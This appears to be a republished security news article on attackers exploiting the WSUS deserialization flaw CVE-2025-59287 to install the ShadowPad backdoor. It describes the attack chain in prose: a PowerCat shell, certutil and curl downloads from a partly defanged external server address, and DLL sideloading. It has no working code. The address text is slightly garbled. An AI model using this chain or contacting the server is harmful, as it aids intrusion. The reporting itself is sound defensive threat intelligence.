A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) was exploited by threat actors to distribute malware known as ShadowPad.
“The attackers targeted Windows servers with WSUS enabled and exploited CVE-2025-59287 for initial access,” the AhnLab Security Intelligence Center (ASEC) said in a report released last week. “They then used PowerCat, an open source PowerShell-based Netcat utility, to obtain a system shell (CMD). They then used certutil and curl to download and install ShadowPad.”
ShadowPad, considered a successor to PlugX, is a modular backdoor widely used by Chinese state-sponsored hacking groups. This virus first appeared in 2015. In an analysis published in August 2021, SentinelOne called it a “masterpiece of privately sold malware in Chinese espionage operations.”
CVE-2025-59287, which Microsoft addressed last month, refers to a critical flaw in WSUS deserialization that can be exploited to achieve remote code execution with system privileges. This vulnerability has since become more frequently exploited, with attackers using it to gain initial access to exposed WSUS instances, perform reconnaissance, and even drop legitimate tools such as Velociraptor.
CVE-2025-59287 ShadowPad installed via exploit
In an attack documented by a South Korean cybersecurity firm, an attacker was found to use this vulnerability to launch Windows utilities such as ‘curl.exe’ and ‘certutil.exe’ to connect to an external server (‘149.28.78’).[.]189:42306″) to download and install ShadowPad.
Similar to PlugX, ShadowPad is launched via DLL sideloading, utilizing a legitimate binary (‘ETDCtrlHelper.exe’) to execute a DLL payload (‘ETDApix.dll’). It acts as a memory-resident loader that executes the backdoor.
Once installed, the malware is designed to launch a core module that loads other plugins embedded in the shellcode into memory. It also includes various anti-detection and persistence techniques.
“After the proof-of-concept (PoC) exploit code for this vulnerability was published, attackers quickly weaponized it and distributed ShadowPad malware via WSUS servers,” AhnLab said. “This vulnerability is significant because it allows remote code execution with system-level privileges, significantly increasing the potential impact.”
Source link
